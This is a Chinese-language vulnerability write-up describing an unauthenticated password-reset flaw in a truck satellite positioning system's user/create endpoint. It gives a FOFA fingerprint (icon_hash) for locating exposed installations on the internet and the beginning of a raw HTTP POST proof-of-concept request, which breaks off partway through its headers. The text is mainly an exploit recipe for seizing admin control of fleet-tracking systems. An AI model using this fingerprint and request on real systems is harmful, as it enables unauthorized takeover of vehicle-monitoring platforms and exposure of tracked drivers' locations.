0x01 产品简介
卡车卫星定位系统是一种基于卫星通信和导航技术的系统,用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间,可以确定接收器(即卡车上的定位设备)所在的位置。具有高精度、高可靠性、全球覆盖等特点,因此在交通领域有广泛的应用。具体来说,它可以为卡车提供实时、准确的定位信息,帮助驾驶员规划行驶路线、避免迷路或走错路。同时,交通管理部门可以通过卫星定位系统对卡车进行监管,确保车辆按照规定路线行驶,防止违规行驶和交通事故的发生。此外,卡车卫星定位系统还可以用于车辆防盗、行驶路线监控及呼叫指挥等功能,提高车辆的安全性和管理效率。
0x02 漏洞概述
卡车卫星定位系统 user/create 接口存在未授权密码重置漏洞,远程攻击者可利用此漏洞获取后台管理权限,使系统处于极不安全的状态。
0x03 复现环境
FOFA:icon_hash="1553867732"
0x04 漏洞复现
PoC
POST /user/create HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: ap
